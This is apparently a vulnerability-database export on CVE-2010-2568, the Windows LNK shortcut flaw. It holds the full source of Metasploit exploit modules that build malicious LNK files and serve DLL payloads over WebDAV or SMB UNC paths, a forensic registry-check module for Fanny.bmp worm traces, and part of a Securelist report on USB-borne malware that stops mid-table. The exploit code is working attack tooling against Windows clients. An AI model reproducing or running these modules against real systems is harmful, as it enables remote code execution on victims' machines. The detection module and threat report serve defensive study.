})\n return\n end\n\n if (request.uri =~ /\\.lnk$/i)\n print_status \"Sending LNK file\"\n\n data = generate_link(\"#{@exploit_unc}#{@exploit_dll}\")\n\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n print_status \"Sending UNC redirect\"\n resp = create_response(200, \"OK\")\n\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>|\n\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"Responding to WebDAV OPTIONS request\")\n headers = {\n 'MS-Author-Via' => 'DAV',\n#\t\t\t'DASL' => '<DAV:sql>',\n#\t\t\t'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, PROPFIND'\n }\n resp = create_response(207, \"Multi-Status\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n print_status(\"Received WebDAV PROPFIND request for #{path}\")\n body = ''\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n my_uri = \"http://#{my_host}/\"\n\n if path =~ /\\.dll$/i\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_dll}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n return\n end\n\n if path =~ /\\.lnk$/i\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_lnk}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>shortcut</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n return\n end\n\n if path !~ /\\/$/\n\n if path.index(\".\")\n print_status(\"Sending 404 for #{path} ...\")\n resp = create_response(404, \"Not Found\")\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n else\n print_status(\"Sending 301 for #{path} ...\")\n resp = create_response(301, \"Moved\")\n resp[\"Location\"] = path + \"/\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n end\n\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n <D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n <D:href>#{path}</D:href>\n <D:propstat>\n <D:prop>\n <lp1:resourcetype><D:collection/></lp1:resourcetype>\n <lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n <lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n <lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n <D:supportedlock>\n <D:lockentry>\n <D:lockscope><D:exclusive/></D:lockscope>\n <D:locktype><D:write/></D:locktype>\n </D:lockentry>\n <D:lockentry>\n <D:lockscope><D:shared/></D:lockscope>\n <D:locktype><D:write/></D:locktype>\n </D:lockentry>\n </D:supportedlock>\n <D:lockdiscovery/>\n <D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n </D:prop>\n <D:status>HTTP/1.1 200 OK</D:status>\n </D:propstat>\n</D:response>\n|\n\n\n subdirectory = %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n\n files = %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_dll}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_lnk}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>shortcut</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n if request[\"Depth\"].to_i > 0\n if path.scan(\"/\").length < 2\n body << subdirectory\n else\n body << files\n end\n end\n\n body << \"</D:multistatus>\"\n\n body.gsub!(/\\t/, '')\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n end\n\n def generate_link(unc)\n uni_unc = unc.unpack(\"C*\").pack(\"v*\")\n path = ''\n path << [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack(\"C*\")\n path << uni_unc\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n\n idlist_data = ''\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [path.length + 2].pack('v')\n idlist_data << path\n idlist_data << [0x00].pack('v') # TERMINAL WOO\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData blocks (none)\n ret << [rand(4)].pack('V')\n\n # Patch in the LinkFlags\n ret[0x14, 4] = [\"10000001000000000000000000000000\".to_i(2)].pack('N')\n ret\n end\n\n def exploit\n\n unc = \"\\\\\\\\\"\n if (datastore['UNCHOST'])\n unc << datastore['UNCHOST'].dup\n else\n unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\n end\n unc << \"\\\\\"\n unc << rand_text_alpha(rand(8)+4)\n unc << \"\\\\\"\n\n @exploit_unc = unc\n @exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\"\n @exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n print_status(\"Send vulnerable clients to #{@exploit_unc}.\")\n print_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\")\n\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb"}, {"lastseen": "2021-03-22T08:10:57", "description": "This module searches for the Fanny.bmp worm related reg keys. fannybmp is a worm that exploited zero day vulns (more specifically, the LNK Exploit CVE-2010-2568). Which allowed it to spread even if USB Autorun was turned off. This is the same exploit that was used in StuxNet.\n", "published": "2021-01-25T19:54:37", "type": "metasploit", "title": "FannyBMP or DementiaWheel Detection Registry Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2021-01-25T19:54:44", "id": "MSF:POST/WINDOWS/GATHER/FORENSICS/FANNY_BMP_CHECK/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'FannyBMP or DementiaWheel Detection Registry Check',\n 'Description' => %q{\n This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['William M.'],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter', 'shell'],\n 'References' =>\n [\n ['URL', 'https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787'],\n ['CVE', '2010-2568']\n ]\n )\n )\n end\n\n def run\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\\"acm\"',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\Driver',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter2',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter3',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter8'\n ]\n\n matches = {}\n print_status('Searching the registry for Fanny.bmp artifacts.')\n artifacts.each do |key|\n key, _, value = key.rpartition('\\\\')\n has_key = registry_enumkeys(key)\n has_val = registry_enumvals(key)\n next unless has_key&.include?(value) || has_val&.include?(value)\n\n print_good(\"Target #{key}\\\\#{value} found in registry.\")\n matches[key] = value\n end\n\n unless matches.empty?\n report_vuln(\n host: session.session_host,\n name: name,\n info: \"Target keys found in registry:\\n#{matches.map { |k, v| \"#{k}: #{v}\\n\" }.join}\",\n refs: references,\n exploited_at: Time.now.utc\n )\n end\n print_status('Done.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/fanny_bmp_check.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T01:01:38", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This creates an SMB resource to provide the payload inside a DLL, and generates a LNK file which must be sent to the target.\n", "published": "2015-03-12T04:23:56", "type": "metasploit", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS10_046_SHORTCUT_ICON_DLLLOADER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::SMB::Server::Share\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\n 'Description'\t=> %q{\n This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.\n },\n 'Author'\t\t=>\n [\n 'hdm', # Module itself\n 'jduck', # WebDAV implementation, UNCHOST var\n 'B_H' # Clean LNK template\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n ['CVE', '2010-2568'],\n ['OSVDB', '66387'],\n ['MSB', 'MS10-046'],\n ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jul 16 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk'])\n ])\n\n register_advanced_options(\n [\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false])\n ])\n\n deregister_options('FILE_CONTENTS', 'FILE_NAME')\n end\n\n def setup\n super\n\n self.file_contents = generate_payload_dll\n self.file_name = \"#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll\"\n print_status(\"File available on #{unc}...\")\n end\n\n def primer\n lnk = generate_link(unc)\n file_create(lnk)\n print_status('The LNK file must be sent or shared with the target...')\n end\n\n def generate_link(unc)\n uni_unc = unc.unpack('C*').pack('v*')\n path = ''\n path << [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n path << uni_unc\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n\n idlist_data = ''\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [path.length + 2].pack('v')\n idlist_data << path\n idlist_data << [0x00].pack('v') # TERMINAL WOO\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData blocks (none)\n ret << [rand(4)].pack('V')\n\n # Patch in the LinkFlags\n ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N')\n ret\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb"}], "securelist": [{"lastseen": "2018-09-25T10:09:11", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568"], "description": "\n\n## Introduction\n\nIn 2016, [researchers](<https://elie.net/publication/users-really-do-plug-in-usb-drives-they-find>) from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.\n\nUSB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>) worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.\n\nToday, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.\n\nUSB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a 'local' cyber incident. These are attacks detected directly on a user's computer and include infections caused by removable media like USB devices.\n\nThis short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.\n\n## Methodology and key findings\n\nThe overview is based on detections by Kaspersky Lab's file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or [risk tools](<https://encyclopedia.kaspersky.com/knowledge/risktool/>) (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).\n\n### Key findings\n\n * USB devices and other removable media are being used to spread cryptocurrency mining software \u2013 and have been since at least 2015. Some victims were found to have been carrying the infection for years.\n * The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.\n * One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).\n * Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.\n * The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.\n * Emerging markets are the most vulnerable to malicious infection spread by removable media \u2013 with Asia, Africa and South America among the most affected \u2013 but isolated hits were also detected in countries in Europe and North America.\n * Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.\n\n## The evolving cyberthreat landscape for USBs\n\nInfections caused by removable media are defined as local threats \u2013 those that are detected directly on a user's computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers \u2013 a strong indicator that the infection source is removable media.\n\nThis data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.\n\nThese numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab's file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.\n\n_*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093420/180924-usb-threats-from-malware-to-miners-1.png>)\n\n_*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093424/180924-usb-threats-from-malware-to-miners-2.png>)\n\n### USBs as a tool for advanced threat actors\n\nUSB devices appeal to attackers targeting computer networks that are not connected to the internet \u2013 such as those powering critical national infrastructure. The most famous example of this is probably the [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>) campaign. In 2009 and 2010, the Stuxnet worm targeted Iran's nuclear facilities in order to disrupt operations.\n\nUSB devices were used to inject malware into the facilities' air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including [Equation Group](<https://securelist.com/equation-group-from-houston-with-love/68877/>), [Flame](<https://securelist.com/the-flame-questions-and-answers-51/34344/>), [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>) and [HackingTeam](<https://securelist.com/spyware-hackingteam/37064/>), have all integrated exploits for this vulnerability into removable media to use in attacks.\n\nFurther, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>) 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.\n\n### The Stuxnet survivor CVE-2010-2568\n\nMicrosoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as [one in four](<https://securelist.com/exploits-how-great-is-the-threat/78125/>) Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this [vulnerability](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>), (although it was overtaken in 2017 by the [EternalBlue](<https://www.wired.co.uk/article/what-is-eternal-blue-exploit-vulnerability-patch>) exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.\n\n_Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093429/180924-usb-threats-from-malware-to-miners-3.png>)\n\n_Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093434/180924-usb-threats-from-malware-to-miners-4.png>)\n\nIf the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.\n\n### Malware delivered via removable media\n\nThe top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of [Windows LNK](<https://threats.kaspersky.com/en/threat/Trojan.WinLNK.Agent/>) malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The [WinLNK Runner Trojan](<https://threats.kaspersky.com/en/threat/Trojan.WinLNK.Runner/>), which was the top detected USB threat in 2017, is used in worms for launching executable files.\n\nIn 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.\n\nFor the WinLNK Runner Trojan the numbers are expected to fall more sharply \u2013 with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).\n\nOther top malware spread through USB devices includes the [Sality](<https://threats.kaspersky.com/en/threat/Virus.Win32.Sality/>) virus, first detected in 2003 but heavily modified since; and the [Dinihou](<https://threats.kaspersky.com/en/threat/Worm.VBS.Dinihou/>) worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.\n\n### Miners \u2013 rare but persistent\n\nUSB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.\n\nMalware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.\n\nKaspersky Lab's data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.\n\nDetection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:\n\n**Year** | **Detection data for Trojan.Win32.Miner.ays ** | 